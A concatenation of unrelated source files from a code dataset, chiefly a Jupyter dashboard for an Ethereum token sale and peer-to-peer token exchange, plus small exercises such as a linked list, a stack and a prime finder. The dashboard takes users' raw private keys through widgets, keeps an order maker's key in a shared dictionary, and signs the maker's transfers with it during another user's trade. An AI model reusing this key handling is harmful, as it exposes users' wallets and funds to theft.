df.dropna(inplace=True)\n \n cumulative_returns = [] \n \n for date in df.index:\n index = 0\n adj_closes = []\n \n for i in df.loc[date]:\n adj_close = i * weights[index]\n adj_closes.append(adj_close)\n \n index += 1\n \n cum_adj_return = sum(adj_closes)\n cumulative_returns.append(cum_adj_return)\n \n df['Portfolio Adj. Close'] = cumulative_returns\n \n df['Daily Adj. Return'] = df['Portfolio Adj. Close'].diff()\n df.dropna(inplace=True)\n \n risk_free = 0.0067\n avg_return = df['Daily Adj. Return'].mean()\n vol = df['Daily Adj. Return'].std()\n sharpe = (avg_return - risk_free) / vol * np.sqrt(252)\n \n return df, sharpe\n\n\n# Creates contract instances for deployer, token, and token sale\n# Need to update address for deployer contract if redeployed\ndeployer_contract = w3.eth.contract(address=deployer_contract_address, abi=deployer_abi)\n\ncoinA_contract = w3.eth.contract(address=deployer_contract.functions.token_address().call(), abi=coin_abi)\n\ncoinA_sale_contract = w3.eth.contract(address=deployer_contract.functions.token_sale_address().call(), abi=sale_abi)\n\n# API pulls exchange rate - USD/ETH\nurl = 'https://rest.coinapi.io/v1/exchangerate/ETH/USD'\nheaders = {'X-CoinAPI-Key' : exchange_rate_key}\nresponse = requests.get(url, headers=headers).text\neth_rate = json.loads(response)['rate']\n\n\n#### Widgets ####\n\nplot_selector = widgets.Dropdown(\n options = ['Historic Returns', 'Historic Volatility', 'Sharpe Ratios', 'LSTM'],\n value = 'Historic Returns',\n description = 'Select: ',\n style = {'description_width': 'initial'},\n disabled=False\n)\n\nbutton = widgets.Button(\n description = 'Update',\n layout={'border': '1px solid black'}\n)\n\n\n# for use on local blockchain only #\n\n#account_selector = widgets.Dropdown(\n# options = w3.eth.accounts,\n# value = w3.eth.accounts[1],\n# description = 'Account: '\n#)\n\n\ncoin_name = coinA_contract.functions.name().call()\n\n# for use on local blockchain only #\n\n#account_selector = widgets.Dropdown(\n# options = w3.eth.accounts,\n# value = w3.eth.accounts[1],\n# description = 'Account: '\n#)\n\n# Must input account address and private key manually on live testnet\naccount_selector = widgets.Text(\n value = '',\n description = 'Account: ',\n placeholder = 'Enter account address'\n)\n\nkey_input = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\n# Input token amount for purchase\ncoin_text = widgets.IntText(\n value = 0,\n description = f'{coin_name}s :',\n style = {'description_width': 'initial'},\n disabled = False\n)\n\n# Purchase button\ncoin_button = widgets.Button(\n description = 'Buy!',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\naccount_input = widgets.HBox([account_selector, key_input])\npurchase_coins = widgets.HBox([coin_text, coin_button])\npurchase_from_acct = widgets.VBox([account_input, purchase_coins])\n\n\n# Show equivalent amount in USD\ndollar_conversion = widgets.Text(\n value = \"{:,}\".format(round(coin_text.value / (10 ** coinA_contract.functions.decimals().call())) * eth_rate, 2),\n description = '$',\n disabled = True\n)\n\n# Confirm purchase\nconfirm_button = widgets.Button(\n description = 'Confirm',\n layout = {'border': '1px solid black'}\n)\n\n# Keeps dollar conversion and confirm button hidden until buy button is clicked\nconfirm_box = widgets.HBox([dollar_conversion, confirm_button])\nconfirm_box.layout.visibility = 'hidden'\npurchase_box = widgets.VBox([purchase_from_acct, confirm_box])\n\n\n# Displays the buyer's purchased tokens\ncons_coin = widgets.IntText(\n value = 0,\n description = f'Your {coin_name}s: ',\n style = {'description_width': 'initial'},\n disabled = True\n)\n\n# Remaining Token Supply\ncons_coin_supply = widgets.IntText(\n value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call()),\n description = f'Remaining supply of {coin_name}: ',\n style = {'description_width': 'initial'},\n disabled = True\n)\n\n\n# Withdraw Tokens widgets\nwithdraw_account = widgets.Text(\n value = '',\n description = 'Account: ',\n placeholder = 'Enter account address: ',\n width = '100%'\n)\n\nwithdraw_key_input = widgets.Password(\n value = '',\n description = 'Private key: ',\n placeholder = 'Enter private key: ',\n layout = widgets.Layout(align_items='center')\n)\n\nwithdraw_button = widgets.Button(\n description = 'Withdraw Tokens',\n layout={'border': '1px solid black'}\n #layout = widgets.Layout(align_items='center')\n)\n\n\ntoken_balance = widgets.IntText(\n value = 0,\n description = coinA_contract.functions.symbol().call(),\n layout = widgets.Layout(align_items='center'),\n disabled = True\n)\n\ntoken_balance_button = widgets.Button(\n description = f'Get {coin_name} Balance',\n layout={'border': '1px solid black'}\n #layout = widgets.Layout(align_items='center')\n)\n\n\n# setting exchange rate for ETH to YodaCoins\nexchange_rate = 1 / (10**(18-coinA_contract.functions.decimals().call()))\n\n# function to convert private key into a readable format for web3 / bit\ndef priv_key_to_account (priv_key):\n return Account.privateKeyToAccount(priv_key)\n\n\n# function to create raw, unsigned transaction\ndef seller_tx(coin, seller_account, buyer_account, amount):\n\n seller_gas_estimate = w3.eth.estimateGas({\n \"from\": seller_account.address, \n \"to\": buyer_account, \n \"value\": w3.toWei(amount,'ether') \n })\n \n seller_details = {\n \"from\": seller_account.address,\n \"to\": buyer_account,\n \"value\": w3.toWei(amount,'ether') ,\n \"gas\": seller_gas_estimate,\n \"gasPrice\": w3.eth.gasPrice,\n \"nonce\": w3.eth.getTransactionCount(seller_account.address),\n }\n \n return seller_details\n\n\n# function to create, sign, and send ethereum transaction \ndef send_tx(coin, seller, seller_pk, buyer, buyer_pk, amount, rate):\n \n seller_raw_tx = seller_tx(coin, seller_pk, buyer, amount)\n seller_signed_tx = seller_pk.signTransaction(seller_raw_tx)\n \n seller_result = w3.eth.sendRawTransaction(seller_signed_tx.rawTransaction)\n \n return seller_result\n\n\n# function to create, sign, and send YodaCoin transaction \ndef token_tx(seller_account, seller_key, buyer_address, amount):\n \n transfer = coinA_contract.functions.transfer(buyer_address, amount).buildTransaction(\n {\n 'gas' : 3000000,\n 'nonce' : w3.eth.getTransactionCount(seller_account)\n }\n )\n \n signed_transfer = w3.eth.account.signTransaction(transfer, seller_key)\n \n transfer_hash = w3.eth.sendRawTransaction(signed_transfer.rawTransaction)\n \n tx_receipt = w3.eth.waitForTransactionReceipt(transfer_hash)\n \n return tx_receipt\n\n\n# creating empty list to hold trade orders and dict to hold trade order metadata\ntrade_blotter_list = []\ntrade_details = {}\n\n# establishing variable for trade amount\nbuy_sell_amount = None\n\n\n# setting up widgets to create orders \n\n# address input widget\nmaker_account_selector = widgets.Text(\n value = '',\n description = 'Maker Account: ',\n placeholder = 'Enter account address',\n style = {'description_width': 'initial'},\n)\n\n# private key input widget\nmaker_key_input = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\n# input token amount for trade\nmaker_coin_text = widgets.IntText(\n value = 0,\n description = 'YodaCoins',\n style = {'description_width': 'initial'},\n disabled = False\n)\n\n# sell order button\nsell_order_button = widgets.Button(\n description = 'Enter Buy Order',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n# buy order button\nbuy_order_button = widgets.Button(\n description = 'Enter Sell Order',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n# function to initiate a new sell order and add to the trade blotter upon button click\ndef sell_order_button_clicked(b):\n \n with trade_taker_output:\n \n seller_address = maker_account_selector.value\n seller_private_key = maker_key_input.value\n seller_pk_readable = priv_key_to_account(seller_private_key)\n buy_sell_amount = maker_coin_text.value\n\n trade_blotter_list.append(f'Sell {buy_sell_amount} YodaCoins')\n trade_blotter.options = trade_blotter_list\n trade_details[trade_blotter_list[-1]] = [seller_address, \n seller_private_key, \n priv_key_to_account(seller_private_key), \n buy_sell_amount, \n 'sell']\n \n trade_taker_output.clear_output()\n display(trade_taker)\n\nsell_order_button.on_click(sell_order_button_clicked)\n\n\n# function to initiate a new buy order and add to the trade blotter upon button click\ndef buy_order_button_clicked(b):\n \n with trade_taker_output:\n \n seller_address = maker_account_selector.value\n seller_private_key = maker_key_input.value\n seller_pk_readable = priv_key_to_account(seller_private_key)\n buy_sell_amount = maker_coin_text.value\n\n trade_blotter_list.append(f'Buy {buy_sell_amount} YodaCoins')\n trade_blotter.options = trade_blotter_list\n trade_details[trade_blotter_list[-1]] = [seller_address, \n seller_private_key, \n priv_key_to_account(seller_private_key),\n buy_sell_amount, \n 'buy']\n \n trade_taker_output.clear_output()\n display(trade_taker)\n\nbuy_order_button.on_click(buy_order_button_clicked)\n\n\n# grouping widgets for order entry\naccount_input = widgets.VBox([maker_account_selector, maker_key_input])\nbuy_sell_buttons = widgets.HBox([sell_order_button, buy_order_button])\norder_amount = widgets.VBox([maker_coin_text, buy_sell_buttons])\n\nbuy_sell_order = widgets.VBox([account_input, order_amount])\n\n\n# creating widget to take trades \n\ntrade_selection = None\n\naccount_selector_2 = widgets.Text(\n value = '',\n description = 'Taker Account: ',\n placeholder = 'Enter account address',\n style = {'description_width': 'initial'},\n)\n\nkey_input_2 = widgets.Password(\n value = '',\n description = 'Private Key: ',\n placeholder = 'Enter private key'\n)\n\n\ntrade_blotter = widgets.Select(\n options = trade_blotter_list,\n description='Available Trades:',\n style = {'description_width': 'initial'},\n disabled=False\n)\n\n# accept trade button\naccept_trade_button = widgets.Button(\n description = 'Accept Trade',\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n# grouping trade taking widgets\ntrade_taker = widgets.VBox([account_selector_2, key_input_2, trade_blotter])\n\n\n# converting trade taker widget into an output widget so that it can be updated dynamically \ntrade_taker_output = widgets.Output()\n\nwith trade_taker_output:\n #trade_taker_output.clear_output()\n display(trade_taker)\n \n \n# function to initiate transaction upon accepting the trade\n# def token_tx(seller_account, seller_key, buyer_address, amount):\ndef accept_trade_button_clicked(b):\n \n with trade_taker_output:\n\n trade_selection = trade_blotter.value\n seller_address = trade_details[trade_selection][0]\n seller_private_key = trade_details[trade_selection][1]\n seller_pk_readable = trade_details[trade_selection][2]\n token_amount = trade_details[trade_selection][3]\n buyer_address = account_selector_2.value\n buyer_private_key = key_input_2.value\n buyer_pk_readable = priv_key_to_account(buyer_private_key)\n\n if trade_details[trade_selection][4] == 'sell':\n\n send_tx(\n ETH,\n seller_address,\n seller_pk_readable,\n buyer_address,\n buyer_pk_readable,\n token_amount * exchange_rate, # * (10**coinA_contract.functions.decimals().call()),\n exchange_rate\n )\n \n token_tx(\n buyer_address,\n buyer_private_key,\n seller_address,\n token_amount * (10**coinA_contract.functions.decimals().call())\n )\n\n elif trade_details[trade_selection][4] == 'buy':\n\n send_tx(\n ETH,\n buyer_address,\n buyer_pk_readable, \n seller_address,\n seller_pk_readable,\n token_amount * exchange_rate, # * (10**coinA_contract.functions.decimals().call()),\n exchange_rate\n )\n \n token_tx(\n seller_address,\n seller_private_key,\n buyer_address,\n token_amount * (10**coinA_contract.functions.decimals().call())\n )\n \n trade_blotter_list.remove(trade_selection)\n trade_blotter.options = trade_blotter_list\n trade_taker_output.clear_output()\n display(trade_taker)\n\naccept_trade_button.on_click(accept_trade_button_clicked)\n\n\n# creating final exchange dashboard\ntrading_app_dash = widgets.VBox(\n [buy_sell_order,trade_taker_output,accept_trade_button],\n layout ={'border': '1px solid black'},\n disabled = False\n)\n\n\n\n# Withdraw tokens functionality - remains hidden until contract is finalized\naccount_box = widgets.VBox([withdraw_account], \n layout = widgets.Layout(align_items='center'),\n width = '100%'\n )\nwithdraw_box = widgets.VBox([withdraw_key_input, withdraw_button], \n layout = widgets.Layout(align_items='center')\n )\ntoken_balance_box = widgets.VBox([token_balance, token_balance_button], \n layout = widgets.Layout(align_items='center')\n )\nafter_sale_box = widgets.AppLayout(\n header = account_box,\n left_sidebar = withdraw_box,\n center = None,\n right_sidebar = token_balance_box,\n footer = None,\n width = '100%'\n #align_items = 'center'\n)\n\npost_sale_box = widgets.VBox([after_sale_box, trading_app_dash])\n\n\npost_sale_box.layout.visibility = 'hidden'\n\n \ncoins_purchased_box = widgets.VBox([cons_coin, cons_coin_supply])\ncoins_box = widgets.VBox([purchase_box, coins_purchased_box])\n \n\ndef select_plots(selector):\n \n if selector == 'Historic Returns':\n plot = fund_and_market_std\n \n elif selector == 'Historic Volatility':\n plot = rolling_beta_plot\n \n elif selector == 'Sharpe Ratios':\n plot = sr_plot\n \n elif selector == 'LSTM':\n plot = prediction_plot\n \n return plot\n\n\n\n## Output widgets ##\n\nout = widgets.Output()\nwith out:\n plot = select_plots(plot_selector.value)\n display(plot)\n \n\ncoin_out = widgets.Output()\nwith coin_out:\n if coinA_sale_contract.functions.isOpen().call():\n display(coins_box)\n else:\n pass\n \n \nconfirm_out = widgets.Output()\nwith confirm_out:\n if coinA_sale_contract.functions.hasClosed().call():\n pass\n else:\n display(confirm_box)\n \n \nwithdraw_out = widgets.Output()\nwith withdraw_out:\n if coinA_sale_contract.functions.finalized().call():\n post_sale_box.layout.visibility = 'visible'\n display(post_sale_box)\n else:\n# #post_sale_box.layout.visibility = 'hidden'\n pass\n \n \n \n## On-click event widgets ##\n\n# Update visuals\ndef on_button_clicked(b):\n with out:\n out.clear_output()\n plot = select_plots(plot_selector.value)\n display(plot)\n\nbutton.on_click(on_button_clicked)\n\n\n# Display dollar conversion and Confirm button\ndef coin_button_clicked(b):\n with confirm_out:\n if coin_text.value > cons_coin_supply.value:\n coin_text.value = cons_coin_supply.value\n else:\n pass\n \n dollar_conversion.value = \"{:,}\".format(round(coin_text.value / (10 ** (18-coinA_contract.functions.decimals().call())) * eth_rate, 2))\n confirm_out.clear_output()\n \n confirm_box.layout.visibility = 'visible'\n display(confirm_box)\n \ncoin_button.on_click(coin_button_clicked)\n\n\n# Declare event when Confirm button is clicked - Activate Buy Tokens function\ndef confirm_button_clicked(b):\n \n with coin_out:\n coin_out.clear_output()\n \n buyer_address = account_selector.value\n \n if coinA_sale_contract.functions.capReached().call() or coinA_sale_contract.functions.hasClosed().call():\n coin_text.disabled = True\n coin_button.disabled = True\n \n elif coin_text.value * coinA_contract.functions.decimals().call() >= coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call():\n \n nonce = w3.eth.getTransactionCount(buyer_address)\n remaining_supply = coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()\n \n transaction = coinA_sale_contract.functions.buyTokens(\n buyer_address).buildTransaction(\n {\n 'value': remaining_supply,\n 'gas': 3000000,\n 'nonce': nonce\n }\n )\n signed_txn = w3.eth.account.signTransaction(transaction, key_input.value)\n txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)\n tx_receipt = w3.eth.waitForTransactionReceipt(txn_hash)\n \n cons_coin.value = coinA_sale_contract.functions.balanceOf(buyer_address).call() / (10**coinA_contract.functions.decimals().call())\n \n cons_coin_supply.value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call())\n \n coin_text.disabled = True\n coin_button.disabled = True\n \n else:\n nonce = w3.eth.getTransactionCount(buyer_address)\n \n transaction = coinA_sale_contract.functions.buyTokens(\n buyer_address).buildTransaction(\n {\n 'value': coin_text.value * (10**coinA_contract.functions.decimals().call()),\n 'gas': 3000000,\n 'nonce': nonce\n }\n )\n signed_txn = w3.eth.account.signTransaction(transaction, key_input.value)\n txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction)\n tx_receipt = w3.eth.waitForTransactionReceipt(txn_hash)\n \n cons_coin.value = coinA_sale_contract.functions.balanceOf(buyer_address).call() / (10**coinA_contract.functions.decimals().call())\n \n cons_coin_supply.value = (coinA_sale_contract.functions.cap().call() - coinA_sale_contract.functions.weiRaised().call()) / (10**coinA_contract.functions.decimals().call())\n \n coin_text.value = 0\n confirm_box.layout.visibility = 'hidden'\n \n display(coins_box)\n \nconfirm_button.on_click(confirm_button_clicked)\n\n\n# Declare event when withdraw button is clicked - withdraw tokens that were previously purchased\ndef withdraw_button_clicked(b):\n with withdraw_out:\n withdraw_address = withdraw_account.value\n withdraw_key = withdraw_key_input.value\n withdraw_out.clear_output()\n #post_sale_box.layout.visibility = 'visible'\n display(post_sale_box)\n \n withdraw = coinA_sale_contract.functions.withdrawTokens(withdraw_address).buildTransaction(\n {\n 'gas': 3000000,\n 'nonce': w3.eth.getTransactionCount(withdraw_address)\n }\n )\n signed_txn_withdraw = w3.eth.account.signTransaction(withdraw, withdraw_key_input.value)\n txn_hash_withdraw = w3.eth.sendRawTransaction(signed_txn_withdraw.rawTransaction)\n tx_receipt_withdraw = w3.eth.waitForTransactionReceipt(txn_hash_withdraw)\n \nwithdraw_button.on_click(withdraw_button_clicked)\n\n\n# Retrieve token balance\ndef token_balance_button_clicked(b):\n with withdraw_out:\n balance_address = withdraw_account.value\n token_balance.value = coinA_contract.functions.balanceOf(balance_address).call() / (10**coinA_contract.functions.decimals().call())\n \ntoken_balance_button.on_click(token_balance_button_clicked)\n\n\n\n# Organizes the widgets into layout boxes\ninteractions = widgets.HBox([plot_selector, button])\nuser_box = widgets.VBox([interactions, out])\n\n# Complete dashboard\ndash = widgets.VBox([user_box, coin_out, post_sale_box], layout={'border': '2px solid black'})\n\n\n\n# Sets a timer to automatically finalize the crowdsale when closing time has been reached.\nopeningTime = coinA_sale_contract.functions.openingTime().call()\nclosingTime = coinA_sale_contract.functions.closingTime().call()\ntime_window = (datetime.fromtimestamp(closingTime) - datetime.fromtimestamp(openingTime))\nseconds = time_window.seconds + 1\n\n# Sets a timer to automatically finalize the crowdsale when closing time has been reached.\n#now = datetime.now()\nclosingTime = coinA_sale_contract.functions.closingTime().call()\ntime_window = (datetime.fromtimestamp(closingTime) - datetime.now())\nseconds = time_window.seconds + 1\n\n# Activates Finalize function automatically when closintTime is reached.\n# Then displays post-sale widgets.\ndef finalize_sale():\n time_till_finalize.cancel()\n \n #if coinA_sale_contract.caller.goalReached():\n \n try:\n transaction_fin = coinA_sale_contract.functions.finalize().buildTransaction(\n {\n 'gas': 3000000,\n 'nonce': w3.eth.getTransactionCount(owner_address)\n }\n )\n signed_txn_fin = w3.eth.account.signTransaction(\n transaction_fin, owner_private_key\n )\n txn_hash_fin = w3.eth.sendRawTransaction(signed_txn_fin.rawTransaction)\n tx_receipt_fin = w3.eth.waitForTransactionReceipt(txn_hash_fin)\n\n except:\n coinA_sale_contract.functions.finalized().call()\n \n #else: # Something should happen if funds are not raised when time ends\n \n #print('Funds not raised')\n \n coin_text.disabled = True\n coin_button.disabled = True\n account_selector.disabled = True\n account_selector.value = ''\n key_input.disabled = True\n key_input.value = ''\n \n coins_box.layout.visibility = 'hidden'\n post_sale_box.layout.visibility = 'visible'\n \n with withdraw_out:\n display(post_sale_box)\n \n\ntime_till_finalize = Timer(seconds, finalize_sale)\n\ntime_till_finalize.start()\n","sub_path":"updated_dash/.ipynb_checkpoints/port_dash-checkpoint.py","file_name":"port_dash-checkpoint.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"395494315","text":"#Complete the LinkedList datatype by implementing the delete, equality, iterate,\n#length, and membership operations. Make sure they have the complexity given\n#in the LinkedList complexities table. Then, implement a test program in your\n#main function to thorougly test the operations you implemented. Call the module\n#linkedlist.py so that you can import this into other programs that may need it.\n\nclass LinkedList:\n class __Node:\n def __init__(self,item,next=None):\n self.item = item\n self.next = next\n \n def getItem(self):\n return self.item \n\n def getNext(self):\n return self.next\n\n def setItem(self, item):\n self.item = item\n\n def setNext(self,next):\n self.next = next\n \n def __init__(self,contents=[]): \n self.first = LinkedList.__Node(None,None)\n self.last = self.first\n self.numItems = 0\n\n for e in contents:\n self.append(e)\n \n \n def __getitem__(self, index):\n if index >= 0 and index < self.numItems:\n cursor = self.first.getNext()\n for i in range(index):\n cursor = cursor.getNext()\n \n return cursor.getItem()\n \n raise IndexError(\"LinkedList index out of range\")\n \n \n def __setitem__(self, index, val):\n if index >= 0 and index < self.numItems:\n cursor = self.first.getNext()\n for i in range(index):\n cursor = cursor.getNext()\n \n return cursor.setItem(val)\n \n raise IndexError(\"LinkedList assignment index out of range\") \n \n \n def __add__(self, other):\n if type(self) != type(other):\n raise TypeError(\"Concatenate undefined for \" + str(type(self)) + \" + \" + str(type(other)))\n \n result = LinkedList()\n \n cursor = self.first.getNext()\n \n while cursor != None:\n result.append(cursor.getItem())\n cursor = cursor.getNext()\n \n cursor = other.first.getNext()\n \n while cursor != None:\n result.append(cursor.getItem())\n cursor = cursor.getNext()\n \n return result \n \n def append(self, item):\n node = LinkedList.__Node(item)\n self.last.setNext(node)\n self.last = node\n self.numItems += 1\n \n def insert(self, index, item):\n cursor = self.first\n \n if index < self.numItems:\n for i in range(index):\n cursor = cursor.getNext()\n \n node = LinkedList.__Node(item, cursor.getNext())\n cursor.setNext(node)\n self.numItems += 1\n \n else:\n self.append(item)\n \n \n def __delitem__(self, index):\n cursor = self.first\n i = 0\n \n while cursor.getNext() != None:\n if i == index:\n cursor.setNext(cursor.getNext().getNext())\n self.numItems -= 1\n if cursor.getNext() == None:\n self.last = cursor\n\n return \n else:\n cursor = cursor.getNext()\n i+=1\n \n\n def __eq__(self, other):\n cursor1 = self.first\n cursor2 = other.first\n \n if self.numItems != other.numItems:\n return False\n \n for i in range(self.numItems):\n if cursor1.getItem() != cursor2.getItem():\n return False\n cursor1 = cursor1.getNext()\n cursor2 = cursor2.getNext()\n \n return True\n \n \n def __iter__(self):\n for i in range(self.numItems):\n if i != None:\n yield self[i]\n \n \n def __len__(self):\n return self.numItems\n \n def __contains__(self, item):\n for i in self:\n if i == item:\n return True\n return False\n \n \n \ndef main():\n x = LinkedList([1,2,3,4,5,6])\n \n print(x[1])\n del x[1]\n print(x[1])\n print(x[2])\n \n a = LinkedList([5,4,3,2])\n b = LinkedList([5,4,3,2])\n print(a == b)\n \n c = LinkedList([1,2,3,4])\n d = LinkedList([7])\n print(c == d)\n print(c == a)\n \n print(len(c))\n \n for i in a:\n print(i)\n \n print(\"Space for readability\")\n \n for n in x:\n print(n)\n \n \n print(len(a))\n print(len(b))\n \n#main()\n\n","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"169950096","text":"import time\nimport pickle\nimport os.path\nimport scipy.io\nfrom residual_booster_network import *\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#number of frames to train on\nN = 32\n#batch size\nbatch = 3\n#number of input features\nin_features = 2\n#number of output features\nout_features = 2\n#filter width\nresolution = 64\n#number of layers\nlayers = 3\n#drop out\ndp = True\n#perceptual loss weight\nalpha = 0.04\n#mean absolute error weight\nbeta = 1\n#learning rate\nlr = 0.0003\n#number of training epochs\nnepoch = 100\n#interval at which to save checkpoint networks\nsave_interval = 20\n#save directory\ndirectory = 'trainedNetwork/'+datetime.now().strftime(\"%d%b_%I%M%P\") + '/'\n#name of final network to save\nsave_directory = 'residual_booster_network'\n#pre-train network with gated variant\npretrain = '../gated/trainedNetwork/12Jul_0749pm/residual_booster_network.h5'\n\nif not os.path.exists(directory):\n os.makedirs(directory)\n\nparameters = {'N':N, 'batch':batch, 'in_features':in_features,'out_features':out_features,'resolution':resolution, 'layers':layers,'dp':dp,'save_directory':save_directory}\n\nwith open(directory+'parameters.pkl','wb') as f:\n pickle.dump(parameters,f)\n\nresidual_booster_network(N,batch,in_features,out_features,resolution,layers,dp,alpha,beta,lr,nepoch,save_interval,directory,save_directory,pretrain,device)\n","sub_path":"ungated/train_network.py","file_name":"train_network.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"44648009","text":"from __future__ import print_function\nfrom PIL import Image\nimport pickle\nimport sys\n\nwith open('trained_clf.p', 'rb') as f:\n clf = pickle.load(f)\n\ndef judge(fname):\n img = Image.open(fname)\n img = img.resize((128, 128))\n img = img.convert('L')\n data = list(img.getdata())\n\n return 10 ** clf.predict([data])[0]\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('Usage: {} file_path'.format(sys.argv[0]))\n exit(1)\n\n print(judge(sys.argv[1]))\n","sub_path":"rating_machine/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"421720383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 16:52:08 2019\n\n@author: \n Jan Brekelmans\n j.j.w.c.brekelmans@gmail.com\n\"\"\"\n\nimport functions\nimport numpy as np\n\ndef compute():\n index = 10001\n \n n = functions.prime_upper_bound(index)\n \n primes = functions.prime_sieve(n)\n \n return str(primes[index-1])\n \n \nif __name__ == \"__main__\":\n print(compute())","sub_path":"Python/projectEuler007.py","file_name":"projectEuler007.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"250764254","text":"print(\"STACK IMPLEMENTATION\")\nstack= []\nwhile True:\n print(\"What you want to perform? \\n 1.Insert an element,2.Remove an element,3.check Size of stack,4.Emptiness of stack,5.EXIT\")\n n = int(input())\n if n == 1:\n print(\"enter the element you want to insert:\")\n l = input()\n stack.append(l)\n print(\"Elements in stack are:\",stack)\n elif n == 2:\n if stack==[]:\n print(\"Empty Stack.You cannot delete!!\")\n else:\n stack.pop()\n print (\"Elements in stack are :\",stack)\n elif n==3:\n print(\"Size of stack is:\",len(stack))\n \n elif n==4:\n if stack==[]:\n print(\"Your stack is Empty!!\")\n else:\n print(\"You have \",len(stack),\"elements in tour stack\")\n \n elif n==5:\n print(\"Exit\")\n break\n","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"274850199","text":"import numpy as np\nimport tensorflow as tf\nfrom scipy.interpolate import interp2d\n\n\nclass CNN_predict():\n def __init__(self, model, scale_cnn, trial, pool_size, rbf_models):\n self.scale_cnn = scale_cnn\n self.trial = trial\n self.model = model\n self.pool_size = pool_size\n self.rbf_models = rbf_models\n\n def rbf_map(self, X, num_centr, centroids, radius):\n hmap_list = []\n s = X.shape\n d1 = np.transpose(np.tile(np.expand_dims(X, axis=0), [num_centr, 1, 1]), [1, 0, 2]) - np.tile(\n np.expand_dims(centroids, axis=0), [s[0], 1, 1])\n d = np.sqrt(np.power(np.multiply(d1, np.tile(np.expand_dims(radius, axis=0), [s[0], 1, 1])), 2))\n phi = np.exp((-1) * np.power(d, 2))\n\n return np.transpose(phi, [1, 0, 2])\n\n def rescale(self, arr, nrows, ncol):\n W, H = arr.shape\n new_W, new_H = (nrows, ncol)\n xrange = lambda x: np.linspace(0, 1, x)\n\n f = interp2d(xrange(H), xrange(W), arr, kind=\"linear\")\n new_arr = f(xrange(new_H), xrange(new_W))\n\n return new_arr\n\n def create_inputs(self, X_train):\n self.N, self.D = X_train.shape\n\n H = []\n\n self.depth = len(self.rbf_models)\n\n self.num_centr = self.model['num_centr']\n\n for i in range(self.depth):\n if len(self.rbf_models[i]['Radius'].shape) == 1:\n self.rbf_models[i]['Radius'] = np.tile(self.rbf_models[i]['Radius'].reshape(1, -1), [self.num_centr, 1])\n\n if self.rbf_models[i]['centroids'].shape[0] != self.num_centr:\n centroids = self.rescale(self.rbf_models[i]['centroids'], self.num_centr, self.D)\n else:\n centroids = self.rbf_models[i]['centroids']\n if np.isscalar(self.rbf_models[i]['Radius']):\n Radius = self.rbf_models[i]['Radius']\n elif self.rbf_models[i]['Radius'].shape[0] == self.num_centr:\n Radius = self.rbf_models[i]['Radius']\n else:\n Radius = self.rescale(self.rbf_models[i]['Radius'], self.num_centr, self.D)\n\n H.append(np.transpose(self.rbf_map(X_train, self.num_centr, centroids, Radius), [1, 2, 0]))\n H[i] = np.array(H[i])\n H[i] = H[i].reshape(-1, self.D * self.num_centr)\n sc = self.scale_cnn[i]\n H[i] = sc.transform(H[i].reshape(-1, self.D * self.num_centr))\n H[i] = np.nan_to_num(H[i].reshape(-1, self.D, self.num_centr))\n\n H = np.transpose(np.stack(H), [1, 2, 3, 0])\n\n return H\n\n def init_weights(self, init_w):\n init_random_dist = tf.convert_to_tensor(init_w)\n return tf.Variable(init_random_dist)\n\n def init_bias(self, init_b):\n init_bias_vals = tf.convert_to_tensor(init_b)\n return tf.Variable(init_bias_vals)\n\n def normal_full_layer(self, input_layer, init_w, init_b):\n\n W = self.init_weights(init_w)\n b = self.init_bias(init_b)\n return tf.add(tf.matmul(input_layer, W), b, name='prediction'), W, b\n\n def build_graph(self, x1, best_weights, kernels, h_size, hold_prob, filters):\n\n with tf.name_scope(\"build_rbf_cnn\") as scope:\n\n if self.trial == 0:\n convo_1 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_output = convo_1_pool(convo_1(x1))\n full_one_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_one_dropout, [-1, s])\n\n elif self.trial == 1:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_output = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * 